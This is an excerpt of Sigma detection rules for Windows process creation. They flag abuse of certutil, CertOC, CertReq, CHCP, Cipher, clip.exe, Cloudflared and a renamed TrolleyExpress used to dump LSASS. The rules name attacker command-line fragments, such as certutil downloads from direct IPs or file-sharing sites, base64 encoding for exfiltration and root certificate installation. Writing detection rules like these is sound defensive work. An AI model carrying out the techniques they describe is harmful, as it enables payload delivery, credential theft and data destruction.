    "path": "rules/windows/process_creation/proc_creation_win_certoc_load_dll.yml",
    "content": "title: DLL Loaded via CertOC.EXE\nid: 242301bc-f92f-4476-8718-78004a6efd9f\nrelated:\n    - id: 84232095-ecca-4015-b0d7-7726507ee793\n      type: similar\nstatus: test\ndescription: Detects when a user installs certificates by using CertOC.exe to loads the target DLL file.\nreferences:\n    - https://twitter.com/sblmsrsn/status/1445758411803480072?s=20\n    - https://github.com/elastic/protections-artifacts/commit/746086721fd385d9f5c6647cada1788db4aea95f#diff-fe98e74189873d6df72a15df2eaa0315c59ba9cdaca93ecd68afc4ea09194ef2\n    - https://lolbas-project.github.io/lolbas/Binaries/Certoc/\nauthor: Austin Songer @austinsonger\ndate: 2021-10-23\nmodified: 2024-03-05\ntags:\n    - attack.defense-evasion\n    - attack.t1218\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|endswith: '\\certoc.exe'\n        - OriginalFileName: 'CertOC.exe'\n    selection_cli:\n        CommandLine|contains|windash: ' -LoadDLL '\n    condition: all of selection_*\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_certoc_load_dll_susp_locations.yml",
    "content": "title: Suspicious DLL Loaded via CertOC.EXE\nid: 84232095-ecca-4015-b0d7-7726507ee793\nrelated:\n    - id: 242301bc-f92f-4476-8718-78004a6efd9f\n      type: similar\nstatus: test\ndescription: Detects when a user installs certificates by using CertOC.exe to load the target DLL file.\nreferences:\n    - https://twitter.com/sblmsrsn/status/1445758411803480072?s=20\n    - https://github.com/elastic/protections-artifacts/commit/746086721fd385d9f5c6647cada1788db4aea95f#diff-fe98e74189873d6df72a15df2eaa0315c59ba9cdaca93ecd68afc4ea09194ef2\n    - https://lolbas-project.github.io/lolbas/Binaries/Certoc/\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-02-15\nmodified: 2024-03-05\ntags:\n    - attack.defense-evasion\n    - attack.t1218\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|endswith: '\\certoc.exe'\n        - OriginalFileName: 'CertOC.exe'\n    selection_cli:\n        CommandLine|contains|windash: ' -LoadDLL '\n    selection_paths:\n        CommandLine|contains:\n            - '\\Appdata\\Local\\Temp\\'\n            - '\\Desktop\\'\n            - '\\Downloads\\'\n            - '\\Users\\Public\\'\n            - 'C:\\Windows\\Tasks\\'\n            - 'C:\\Windows\\Temp\\'\n    condition: all of selection_*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_certreq_download.yml",
    "content": "title: Suspicious CertReq Command to Download\nid: 4480827a-9799-4232-b2c4-ccc6c4e9e12b\nstatus: experimental\ndescription: |\n    Detects a suspicious CertReq execution downloading a file.\n    This behavior is often used by attackers to download additional payloads or configuration files.\n    Certreq is a built-in Windows utility used to request and retrieve certificates from a certification authority (CA). However, it can be abused by threat actors for malicious purposes.\nreferences:\n    - https://lolbas-project.github.io/lolbas/Binaries/Certreq/\nauthor: Christian Burkard (Nextron Systems)\ndate: 2021-11-24\nmodified: 2025-10-29\ntags:\n    - attack.command-and-control\n    - attack.t1105\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|endswith: '\\certreq.exe'\n        - OriginalFileName: 'CertReq.exe'\n    selection_cli_flag_post:\n        CommandLine|contains|windash: '-Post'\n    selection_cli_flag_config:\n        CommandLine|contains|windash: '-config'\n    selection_cli_http:\n        CommandLine|contains: 'http'\n    condition: all of selection_*\nfalsepositives:\n    - Unlikely\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_certutil_certificate_installation.yml",
    "content": "title: New Root Certificate Installed Via Certutil.EXE\nid: d2125259-ddea-4c1c-9c22-977eb5b29cf0\nrelated:\n    - id: 42821614-9264-4761-acfc-5772c3286f76\n      type: derived\n    - id: 46591fae-7a4c-46ea-aec3-dff5e6d785dc\n      type: obsolete\nstatus: test\ndescription: |\n    Detects execution of \"certutil\" with the \"addstore\" flag in order to install a new certificate on the system.\n    Adversaries may install a root certificate on a compromised system to avoid warnings when connecting to adversary controlled web servers.\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1553.004/T1553.004.md\nauthor: oscd.community, @redcanary, Zach Stanford @svch0st\ndate: 2023-03-05\nmodified: 2024-03-05\ntags:\n    - attack.defense-evasion\n    - attack.t1553.004\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    # Example: certutil -addstore -f -user ROOT CertificateFileName.der\n    selection_img:\n        - Image|endswith: '\\certutil.exe'\n        - OriginalFileName: 'CertUtil.exe'\n    selection_cli_add:\n        CommandLine|contains|windash: '-addstore'\n    selection_cli_store:\n        CommandLine|contains: 'root'\n    condition: all of selection_*\nfalsepositives:\n    - Help Desk or IT may need to manually add a corporate Root CA on occasion. Need to test if GPO push doesn't trigger FP\nlevel: medium\nregression_tests_path: regression_data/rules/windows/process_creation/proc_creation_win_certutil_certificate_installation/info.yml\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_certutil_decode.yml",
    "content": "title: File Decoded From Base64/Hex Via Certutil.EXE\nid: cc9cbe82-7bc0-4ef5-bc23-bbfb83947be7\nstatus: test\ndescription: Detects the execution of certutil with either the \"decode\" or \"decodehex\" flags to decode base64 or hex encoded files. This can be abused by attackers to decode an encoded payload before execution\nreferences:\n    - https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/certutil\n    - https://unit42.paloaltonetworks.com/new-babyshark-malware-targets-u-s-national-security-think-tanks/\n    - https://news.sophos.com/en-us/2021/04/13/compromised-exchange-server-hosting-cryptojacker-targeting-other-exchange-servers/\n    - https://twitter.com/JohnLaTwC/status/835149808817991680\n    - https://learn.microsoft.com/en-us/archive/blogs/pki/basic-crl-checking-with-certutil\n    - https://lolbas-project.github.io/lolbas/Binaries/Certutil/\nauthor: Florian Roth (Nextron Systems), Jonhnathan Ribeiro, oscd.community\ndate: 2023-02-15\nmodified: 2025-06-04\ntags:\n    - attack.defense-evasion\n    - attack.t1027\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|endswith: '\\certutil.exe'\n        - OriginalFileName: 'CertUtil.exe'\n    selection_cli:\n        CommandLine|contains|windash:\n            - '-decode ' # Decode Base64\n            - '-decodehex ' # Decode Hex\n    condition: all of selection_*\nfalsepositives:\n    - Unknown\nlevel: high\nregression_tests_path: regression_data/rules/windows/process_creation/proc_creation_win_certutil_decode/info.yml\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_certutil_download.yml",
    "content": "title: Suspicious Download Via Certutil.EXE\nid: 19b08b1c-861d-4e75-a1ef-ea0c1baf202b\nrelated:\n    - id: 13e6fe51-d478-4c7e-b0f2-6da9b400a829\n      type: similar\nstatus: test\ndescription: Detects the execution of certutil with certain flags that allow the utility to download files.\nreferences:\n    - https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/certutil\n    - https://forensicitguy.github.io/agenttesla-vba-certutil-download/\n    - https://news.sophos.com/en-us/2021/04/13/compromised-exchange-server-hosting-cryptojacker-targeting-other-exchange-servers/\n    - https://twitter.com/egre55/status/1087685529016193025\n    - https://lolbas-project.github.io/lolbas/Binaries/Certutil/\n    - https://www.hexacorn.com/blog/2020/08/23/certutil-one-more-gui-lolbin\nauthor: Florian Roth (Nextron Systems), Jonhnathan Ribeiro, oscd.community, Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-02-15\nmodified: 2025-12-01\ntags:\n    - attack.defense-evasion\n    - attack.t1027\n    - attack.command-and-control\n    - attack.t1105\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|endswith: '\\certutil.exe'\n        - OriginalFileName: 'CertUtil.exe'\n    selection_flags:\n        CommandLine|contains:\n            - 'urlcache '\n            - 'verifyctl '\n            - 'URL '\n    selection_http:\n        CommandLine|contains: 'http'\n    condition: all of selection_*\nfalsepositives:\n    - Unknown\nlevel: medium\nregression_tests_path: regression_data/rules/windows/process_creation/proc_creation_win_certutil_download/info.yml\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_certutil_download_direct_ip.yml",
    "content": "title: Suspicious File Downloaded From Direct IP Via Certutil.EXE\nid: 13e6fe51-d478-4c7e-b0f2-6da9b400a829\nrelated:\n    - id: 19b08b1c-861d-4e75-a1ef-ea0c1baf202b # Direct IP download\n      type: similar\n    - id: 42a5f1e7-9603-4f6d-97ae-3f37d130d794 # File sharing download\n      type: similar\nstatus: test\ndescription: Detects the execution of certutil with certain flags that allow the utility to download files from direct IPs.\nreferences:\n    - https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/certutil\n    - https://forensicitguy.github.io/agenttesla-vba-certutil-download/\n    - https://news.sophos.com/en-us/2021/04/13/compromised-exchange-server-hosting-cryptojacker-targeting-other-exchange-servers/\n    - https://twitter.com/egre55/status/1087685529016193025\n    - https://lolbas-project.github.io/lolbas/Binaries/Certutil/\n    - https://twitter.com/_JohnHammond/status/1708910264261980634\n    - https://www.hexacorn.com/blog/2020/08/23/certutil-one-more-gui-lolbin\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-02-15\nmodified: 2025-12-01\ntags:\n    - attack.defense-evasion\n    - attack.t1027\n    - attack.command-and-control\n    - attack.t1105\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|endswith: '\\certutil.exe'\n        - OriginalFileName: 'CertUtil.exe'\n    selection_flags:\n        CommandLine|contains:\n            - 'urlcache '\n            - 'verifyctl '\n            - 'URL '\n    selection_http:\n        CommandLine|contains:\n            - '://1'\n            - '://2'\n            - '://3'\n            - '://4'\n            - '://5'\n            - '://6'\n            - '://7'\n            - '://8'\n            - '://9'\n    # filter_local_ips:\n    #     # Note: Uncomment this filter if you want to exclude local IPs\n    #     CommandLine|contains:\n    #         - '://10.' # 10.0.0.0/8\n    #         - '://192.168.' # 192.168.0.0/16\n    #         - '://172.16.' # 172.16.0.0/12\n    #         - '://172.17.'\n    #         - '://172.18.'\n    #         - '://172.19.'\n    #         - '://172.20.'\n    #         - '://172.21.'\n    #         - '://172.22.'\n    #         - '://172.23.'\n    #         - '://172.24.'\n    #         - '://172.25.'\n    #         - '://172.26.'\n    #         - '://172.27.'\n    #         - '://172.28.'\n    #         - '://172.29.'\n    #         - '://172.30.'\n    #         - '://172.31.'\n    #         - '://127.' # 127.0.0.0/8\n    #         - '://169.254.' # 169.254.0.0/16\n    filter_main_seven_zip:\n        CommandLine|contains: '://7-' # For https://7-zip.org/\n    condition: all of selection_* and not 1 of filter_main_*\nfalsepositives:\n    - Unknown\nlevel: high\nregression_tests_path: regression_data/rules/windows/process_creation/proc_creation_win_certutil_download_direct_ip/info.yml\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_certutil_download_file_sharing_domains.yml",
    "content": "title: Suspicious File Downloaded From File-Sharing Website Via Certutil.EXE\nid: 42a5f1e7-9603-4f6d-97ae-3f37d130d794\nrelated:\n    - id: 19b08b1c-861d-4e75-a1ef-ea0c1baf202b # Direct IP download\n      type: similar\n    - id: 13e6fe51-d478-4c7e-b0f2-6da9b400a829 # Generic download\n      type: similar\nstatus: test\ndescription: Detects the execution of certutil with certain flags that allow the utility to download files from file-sharing websites.\nreferences:\n    - https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/certutil\n    - https://forensicitguy.github.io/agenttesla-vba-certutil-download/\n    - https://news.sophos.com/en-us/2021/04/13/compromised-exchange-server-hosting-cryptojacker-targeting-other-exchange-servers/\n    - https://twitter.com/egre55/status/1087685529016193025\n    - https://lolbas-project.github.io/lolbas/Binaries/Certutil/\n    - https://www.microsoft.com/en-us/security/blog/2024/01/17/new-ttps-observed-in-mint-sandstorm-campaign-targeting-high-profile-individuals-at-universities-and-research-orgs/\n    - https://www.hexacorn.com/blog/2020/08/23/certutil-one-more-gui-lolbin\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-02-15\nmodified: 2025-12-10\ntags:\n    - attack.defense-evasion\n    - attack.t1027\n    - attack.command-and-control\n    - attack.t1105\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|endswith: '\\certutil.exe'\n        - OriginalFileName: 'CertUtil.exe'\n    selection_flags:\n        CommandLine|contains:\n            - 'urlcache '\n            - 'verifyctl '\n            - 'URL '\n    selection_http:\n        CommandLine|contains:\n            - '.githubusercontent.com'       # Includes both gists and github repositories / Michael Haag (idea)\n            - 'anonfiles.com'\n            - 'cdn.discordapp.com'\n            - 'ddns.net'\n            - 'dl.dropboxusercontent.com'\n            - 'ghostbin.co'\n            - 'github.com'\n            - 'glitch.me'\n            - 'gofile.io'\n            - 'hastebin.com'\n            - 'mediafire.com'\n            - 'mega.nz'\n            - 'onrender.com'\n            - 'pages.dev'\n            - 'paste.ee'\n            - 'pastebin.com'\n            - 'pastebin.pl'\n            - 'pastetext.net'\n            - 'privatlab.com'\n            - 'privatlab.net'\n            - 'send.exploit.in'\n            - 'sendspace.com'\n            - 'storage.googleapis.com'\n            - 'storjshare.io'\n            - 'supabase.co'\n            - 'temp.sh'\n            - 'transfer.sh'\n            - 'trycloudflare.com'\n            - 'ufile.io'\n            - 'w3spaces.com'\n            - 'workers.dev'\n    condition: all of selection_*\nfalsepositives:\n    - Unknown\nlevel: high\nregression_tests_path: regression_data/rules/windows/process_creation/proc_creation_win_certutil_download_file_sharing_domains/info.yml\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_certutil_encode.yml",
    "content": "title: File Encoded To Base64 Via Certutil.EXE\nid: e62a9f0c-ca1e-46b2-85d5-a6da77f86d1a\nstatus: test\ndescription: Detects the execution of certutil with the \"encode\" flag to encode a file to base64. This can be abused by threat actors and attackers for data exfiltration\nreferences:\n    - https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/certutil\n    - https://unit42.paloaltonetworks.com/new-babyshark-malware-targets-u-s-national-security-think-tanks/\n    - https://lolbas-project.github.io/lolbas/Binaries/Certutil/\nauthor: Florian Roth (Nextron Systems), Jonhnathan Ribeiro, oscd.community, Nasreddine Bencherchali (Nextron Systems)\ndate: 2019-02-24\nmodified: 2024-03-05\ntags:\n    - attack.defense-evasion\n    - attack.t1027\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|endswith: '\\certutil.exe'\n        - OriginalFileName: 'CertUtil.exe'\n    selection_cli:\n        CommandLine|contains|windash: '-encode'\n    condition: all of selection_*\nfalsepositives:\n    - As this is a general purpose rule, legitimate usage of the encode functionality will trigger some false positives. Apply additional filters accordingly\nlevel: medium\nregression_tests_path: regression_data/rules/windows/process_creation/proc_creation_win_certutil_encode/info.yml\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_certutil_encode_susp_extensions.yml",
    "content": "title: Suspicious File Encoded To Base64 Via Certutil.EXE\nid: ea0cdc3e-2239-4f26-a947-4e8f8224e464\nrelated:\n    - id: e62a9f0c-ca1e-46b2-85d5-a6da77f86d1a\n      type: derived\nstatus: test\ndescription: Detects the execution of certutil with the \"encode\" flag to encode a file to base64 where the extensions of the file is suspicious\nreferences:\n    - https://www.virustotal.com/gui/file/35c22725a92d5cb1016b09421c0a6cdbfd860fd4778b3313669b057d4a131cb7/behavior\n    - https://www.virustotal.com/gui/file/427616528b7dbc4a6057ac89eb174a3a90f7abcf3f34e5a359b7a910d82f7a72/behavior\n    - https://www.virustotal.com/gui/file/34de4c8beded481a4084a1fd77855c3e977e8ac643e5c5842d0f15f7f9b9086f/behavior\n    - https://www.virustotal.com/gui/file/4abe1395a09fda06d897a9c4eb247278c1b6cddda5d126ce5b3f4f499e3b8fa2/behavior\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-05-15\nmodified: 2024-03-05\ntags:\n    - attack.defense-evasion\n    - attack.t1027\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|endswith: '\\certutil.exe'\n        - OriginalFileName: 'CertUtil.exe'\n    selection_cli:\n        CommandLine|contains|windash: '-encode'\n    selection_extension:\n        CommandLine|contains:\n            - '.acl'\n            - '.bat'\n            - '.doc'\n            - '.gif'\n            - '.jpeg'\n            - '.jpg'\n            - '.mp3'\n            - '.pdf'\n            - '.png'\n            - '.ppt'\n            - '.tmp'\n            - '.xls'\n            - '.xml'\n    condition: all of selection_*\nfalsepositives:\n    - Unknown\nlevel: high\nregression_tests_path: regression_data/rules/windows/process_creation/proc_creation_win_certutil_encode_susp_extensions/info.yml\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_certutil_encode_susp_location.yml",
    "content": "title: File In Suspicious Location Encoded To Base64 Via Certutil.EXE\nid: 82a6714f-4899-4f16-9c1e-9a333544d4c3\nrelated:\n    - id: e62a9f0c-ca1e-46b2-85d5-a6da77f86d1a\n      type: derived\nstatus: test\ndescription: Detects the execution of certutil with the \"encode\" flag to encode a file to base64 where the files are located in potentially suspicious locations\nreferences:\n    - https://www.virustotal.com/gui/file/35c22725a92d5cb1016b09421c0a6cdbfd860fd4778b3313669b057d4a131cb7/behavior\n    - https://www.virustotal.com/gui/file/427616528b7dbc4a6057ac89eb174a3a90f7abcf3f34e5a359b7a910d82f7a72/behavior\n    - https://www.virustotal.com/gui/file/34de4c8beded481a4084a1fd77855c3e977e8ac643e5c5842d0f15f7f9b9086f/behavior\n    - https://www.virustotal.com/gui/file/4abe1395a09fda06d897a9c4eb247278c1b6cddda5d126ce5b3f4f499e3b8fa2/behavior\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-05-15\nmodified: 2024-03-05\ntags:\n    - attack.defense-evasion\n    - attack.t1027\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|endswith: '\\certutil.exe'\n        - OriginalFileName: 'CertUtil.exe'\n    selection_cli:\n        CommandLine|contains|windash: '-encode'\n    selection_extension:\n        CommandLine|contains:\n            # Note: Add more suspicious locations to increase coverage\n            - '\\AppData\\Roaming\\'\n            - '\\Desktop\\'\n            - '\\Local\\Temp\\'\n            - '\\PerfLogs\\'\n            - '\\Users\\Public\\'\n            - '\\Windows\\Temp\\'\n            - '$Recycle.Bin'\n    condition: all of selection_*\nfalsepositives:\n    - Unknown\nlevel: high\nregression_tests_path: regression_data/rules/windows/process_creation/proc_creation_win_certutil_encode_susp_location/info.yml\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_certutil_export_pfx.yml",
    "content": "title: Certificate Exported Via Certutil.EXE\nid: 3ffd6f51-e6c1-47b7-94b4-c1e61d4117c5\nstatus: test\ndescription: Detects the execution of the certutil with the \"exportPFX\" flag which allows the utility to export certificates.\nreferences:\n    - https://www.splunk.com/en_us/blog/security/a-golden-saml-journey-solarwinds-continued.html\nauthor: Florian Roth (Nextron Systems), Jonhnathan Ribeiro, oscd.community, Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-02-15\nmodified: 2024-03-05\ntags:\n    - attack.defense-evasion\n    - attack.t1027\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|endswith: '\\certutil.exe'\n        - OriginalFileName: 'CertUtil.exe'\n    selection_cli:\n        CommandLine|contains|windash: '-exportPFX '\n    condition: all of selection_*\nfalsepositives:\n    - There legitimate reasons to export certificates. Investigate the activity to determine if it's benign\nlevel: medium\nregression_tests_path: regression_data/rules/windows/process_creation/proc_creation_win_certutil_export_pfx/info.yml\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_certutil_ntlm_coercion.yml",
    "content": "title: Potential NTLM Coercion Via Certutil.EXE\nid: 6c6d9280-e6d0-4b9d-80ac-254701b64916\nstatus: test\ndescription: Detects possible NTLM coercion via certutil using the 'syncwithWU' flag\nreferences:\n    - https://github.com/LOLBAS-Project/LOLBAS/issues/243\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-09-01\nmodified: 2023-02-14\ntags:\n    - attack.defense-evasion\n    - attack.t1218\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|endswith: '\\certutil.exe'\n        - OriginalFileName: 'CertUtil.exe'\n    selection_cli:\n        CommandLine|contains|all:\n            - ' -syncwithWU '\n            - ' \\\\\\\\'\n    condition: all of selection_*\nfalsepositives:\n    - Unknown\nlevel: high\nregression_tests_path: regression_data/rules/windows/process_creation/proc_creation_win_certutil_ntlm_coercion/info.yml\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_chcp_codepage_lookup.yml",
    "content": "title: Console CodePage Lookup Via CHCP\nid: 7090adee-82e2-4269-bd59-80691e7c6338\nstatus: test\ndescription: Detects use of chcp to look up the system locale value as part of host discovery\nreferences:\n    - https://thedfirreport.com/2022/04/04/stolen-images-campaign-ends-in-conti-ransomware/\n    - https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/chcp\nauthor: _pete_0, TheDFIRReport\ndate: 2022-02-21\nmodified: 2024-03-05\ntags:\n    - attack.discovery\n    - attack.t1614.001\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        ParentImage|endswith: '\\cmd.exe'\n        ParentCommandLine|contains|windash:\n            - ' -c '\n            - ' -r '\n            - ' -k '\n        Image|endswith: '\\chcp.com'\n        CommandLine|endswith:\n            - 'chcp'\n            - 'chcp '\n            - 'chcp  '\n    condition: selection\nfalsepositives:\n    - During Anaconda update the 'conda.exe' process will eventually execution the 'chcp' command.\n    - Discord was seen using chcp to look up code pages\nlevel: medium\nregression_tests_path: regression_data/rules/windows/process_creation/proc_creation_win_chcp_codepage_lookup/info.yml\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_chcp_codepage_switch.yml",
    "content": "title: Suspicious CodePage Switch Via CHCP\nid: c7942406-33dd-4377-a564-0f62db0593a3\nstatus: test\ndescription: Detects a code page switch in command line or batch scripts to a rare language\nreferences:\n    - https://learn.microsoft.com/en-us/windows/win32/intl/code-page-identifiers\n    - https://twitter.com/cglyer/status/1183756892952248325\nauthor: Florian Roth (Nextron Systems), Jonhnathan Ribeiro, oscd.community\ndate: 2019-10-14\nmodified: 2023-03-07\ntags:\n    - attack.t1036\n    - attack.defense-evasion\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        Image|endswith: '\\chcp.com'\n        CommandLine|endswith:\n            - ' 936'    # Chinese\n            # - ' 1256' # Arabic\n            - ' 1258'   # Vietnamese\n            # - ' 855'  # Russian\n            # - ' 866'  # Russian\n            # - ' 864'  # Arabic\n    condition: selection\nfalsepositives:\n    - Administrative activity (adjust code pages according to your organization's region)\nlevel: medium\nregression_tests_path: regression_data/rules/windows/process_creation/proc_creation_win_chcp_codepage_switch/info.yml\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_cipher_overwrite_deleted_data.yml",
    "content": "title: Deleted Data Overwritten Via Cipher.EXE\nid: 4b046706-5789-4673-b111-66f25fe99534\nstatus: test\ndescription: |\n    Detects usage of the \"cipher\" built-in utility in order to overwrite deleted data from disk.\n    Adversaries may destroy data and files on specific systems or in large numbers on a network to interrupt availability to systems, services, and network resources.\n    Data destruction is likely to render stored data irrecoverable by forensic techniques through overwriting files or data on local and remote drives\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1485/T1485.md#atomic-test-3---overwrite-deleted-data-on-c-drive\nauthor: frack113\ndate: 2021-12-26\nmodified: 2023-02-21\ntags:\n    - attack.impact\n    - attack.t1485\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - OriginalFileName: 'CIPHER.EXE'\n        - Image|endswith: '\\cipher.exe'\n    selection_cli:\n        CommandLine|contains: ' /w:'\n    condition: all of selection_*\nfalsepositives:\n    - Unknown\nlevel: medium\nregression_tests_path: regression_data/rules/windows/process_creation/proc_creation_win_cipher_overwrite_deleted_data/info.yml\nsimulation:\n    - type: atomic-red-team\n      name: Overwrite deleted data on C drive\n      technique: T1485\n      atomic_guid: 321fd25e-0007-417f-adec-33232252be19\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_citrix_trolleyexpress_procdump.yml",
    "content": "title: Process Access via TrolleyExpress Exclusion\nid: 4c0aaedc-154c-4427-ada0-d80ef9c9deb6\nstatus: test\ndescription: Detects a possible process memory dump that uses the white-listed Citrix TrolleyExpress.exe filename as a way to dump the lsass process memory\nreferences:\n    - https://twitter.com/_xpn_/status/1491557187168178176\n    - https://www.youtube.com/watch?v=Ie831jF0bb0\nauthor: Florian Roth (Nextron Systems)\ndate: 2022-02-10\nmodified: 2022-05-13\ntags:\n    - attack.defense-evasion\n    - attack.t1218.011\n    - attack.credential-access\n    - attack.t1003.001\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        CommandLine|contains:\n      # We assume that the lsass.exe process has a process ID that's between 700 and 999 and the dumper uses just the PID as parameter\n            - '\\TrolleyExpress 7'\n            - '\\TrolleyExpress 8'\n            - '\\TrolleyExpress 9'\n            - '\\TrolleyExpress.exe 7'\n            - '\\TrolleyExpress.exe 8'\n            - '\\TrolleyExpress.exe 9'\n      # Common dumpers\n            - '\\TrolleyExpress.exe -ma '\n    renamed:\n        Image|endswith: '\\TrolleyExpress.exe'\n    filter_renamed:\n        OriginalFileName|contains: 'CtxInstall'\n    filter_empty:\n        OriginalFileName: null\n    condition: selection or ( renamed and not 1 of filter* )\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_clip_execution.yml",
    "content": "title: Data Copied To Clipboard Via Clip.EXE\nid: ddeff553-5233-4ae9-bbab-d64d2bd634be\nstatus: test\ndescription: Detects the execution of clip.exe in order to copy data to the clipboard. Adversaries may collect data stored in the clipboard from users copying information within or between applications.\nreferences:\n    - https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/clip\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1115/T1115.md\nauthor: frack113\ndate: 2021-07-27\nmodified: 2023-02-21\ntags:\n    - attack.collection\n    - attack.t1115\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        - Image|endswith: '\\clip.exe'\n        - OriginalFileName: clip.exe\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: low\nregression_tests_path: regression_data/rules/windows/process_creation/proc_creation_win_clip_execution/info.yml\nsimulation:\n    - type: atomic-red-team\n      name: Utilize Clipboard to store or execute commands from\n      technique: T1115\n      atomic_guid: 0cd14633-58d4-4422-9ede-daa2c9474ae7\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_cloudflared_portable_execution.yml",
    "content": "title: Cloudflared Portable Execution\nid: fadb84f0-4e84-4f6d-a1ce-9ef2bffb6ccd\nstatus: test\ndescription: |\n    Detects the execution of the \"cloudflared\" binary from a non standard location.\nreferences:\n    - https://developers.cloudflare.com/cloudflare-one/connections/connect-networks/do-more-with-tunnels/trycloudflare/\n    - https://github.com/cloudflare/cloudflared\n    - https://www.intrinsec.com/akira_ransomware/\n    - https://www.guidepointsecurity.com/blog/tunnel-vision-cloudflared-abused-in-the-wild/\n    - https://github.com/cloudflare/cloudflared/releases\nauthor: Nasreddine Bencherchali (Nextron Systems)\ntags:\n    - attack.command-and-control\n    - attack.t1090.001\ndate: 2023-12-20\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        Image|endswith: '\\cloudflared.exe'\n    filter_main_admin_location:\n        Image|contains:\n            - ':\\Program Files (x86)\\cloudflared\\'\n            - ':\\Program Files\\cloudflared\\'\n    condition: selection and not 1 of filter_main_*\nfalsepositives:\n    - Legitimate usage of Cloudflared portable versions\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_cloudflared_quicktunnel_execution.yml",
    "content": "title: Cloudflared Quick Tunnel Execution\nid: 222129f7-f4dc-4568-b0d2-22440a9639ba\nrelated:\n    - id: 7050bba1-1aed-454e-8f73-3f46f09ce56a\n      type: similar\n    - id: 9a019ffc-3580-4c9d-8d87-079f7e8d3fd4\n      type: similar\nstatus: test\ndescription: |\n    Detects creation of an ad-hoc Cloudflare Quick Tunnel, which can be used to tunnel local services such as HTTP, RDP, SSH and SMB.\n    The free TryCloudflare Quick Tunnel will generate a random subdomain on trycloudflare[.]com, following a call to api[.]trycloudflare[.]com.\n    The tool has been observed in use by threat groups including Akira ransomware.\nreferences:\n    - https://developers.cloudflare.com/cloudflare-one/connections/connect-networks/do-more-with-tunnels/trycloudflare/\n    - https://github.com/cloudflare/cloudflared\n    - https://www.intrinsec.com/akira_ransomware/\n    - https://www.guidepointsecurity.com/blog/tunnel-vision-cloudflared-abused-in-the-wild/\nauthor: Sajid Nawaz Khan\ntags:\n    - attack.command-and-control\n    - attack.t1090.001\ndate: 2023-12-20\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|endswith:\n              - '\\cloudflared.exe'\n              - '\\cloudflared-windows-386.exe'\n              - '\\cloudflared-windows-amd64.exe'\n        - Hashes|contains:\n              - 'SHA256=2fb6c04c4f95fb8d158af94c137f90ac820716deaf88d8ebec956254e046cb29'\n              - 'SHA256=b3d21940a10fdef5e415ad70331ce257c24fe3bcf7722262302e0421791f87e8'\n              - 'SHA256=1fbd8362b2d2d2e6a5750ae3db69cd1815e6c1d31da48a98b796450971a8e039'\n              - 'SHA256=0409c9b12f9d0eda86e461ed9bdabeefb00172b26322079681a0bdf48e68dc28'\n              - 